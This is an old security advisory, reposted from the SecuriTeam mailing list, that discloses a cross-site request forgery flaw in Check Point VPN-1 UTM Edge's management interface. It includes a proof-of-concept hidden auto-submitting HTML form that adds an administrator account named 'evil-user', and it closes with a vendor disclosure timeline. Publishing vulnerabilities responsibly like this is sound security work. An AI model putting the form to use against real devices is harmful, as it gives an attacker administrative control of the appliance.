Wednesday, June 27, 2007

[NEWS] CheckPoint VPN-1 UTM Edge Cross Site Request Forgery Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site:
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CheckPoint VPN-1 UTM Edge Cross Site Request Forgery Vulnerability


VPN-1 UTM Edge appliances deliver "unified threat management to
enterprises with branch offices and simplify security deployments and

During an audit of VPN-1 UTM Edge it was discovered that a cross site
request forgery vulnerability exists in the management interface. Thus, it
is possible for an attacker to perform any administrative actions in the
management interface. These include e.g. adding additional admin users.


Checkpoint VPN-1 Edge Embedded device management interface does not
validate the origin of an HTTP request. If attacker is able to make user
visit a hostile web page, a VPN-1 Edge device can be controlled by
submitting suitable forms. It is possible to add new users for example.

Successful attack requires that the attacker knows the management
interface address for the target device. As the management interface does
not have logout functionality, user can be vulnerable to this attack even
after closing a tab containing the management interface (if user does not
close the browser window or clear cookies and depending on browser

Proof of Concept:
Example form (adds new read-only administrator):

<body onload="document.CSRF.submit()">
<form name="CSRF" method="post"
action=" "style="display:none">

<input name="swstate" value="WizU1">
<input name="swtosave" value="1">
<input name="swback" value="0">
<input name="swindex" value="-1">
<input name="swuuser" value="evil-user">
<input name="swupass" value="password">
<input name="swuexp" value="0">
<input name="swuday" value="4">
<input name="swumonth" value="5">
<input name="swuyear" value="2008">
<input name="swuhour" value="03">
<input name="swumin" value="11">
<input name="swuampm" value="1">
<input name="swuacc" value="1">
<input name="swuvpn" value="0">
<input name="swuufp" value="0">
<input name="swuhot" value="0">
<input name="tacc" value="1">


Disclosure Timeline:
7. June 2007 - Contacted Checkpoint by email
26. June 2007 - Vendor released an updated version
26. June 2007 - Advisory was released


The information has been provided by <>
Henri Lindberg, Associate of (ISC) or <>
Jussi Vuokko, CISSP.
The original article can be found at:


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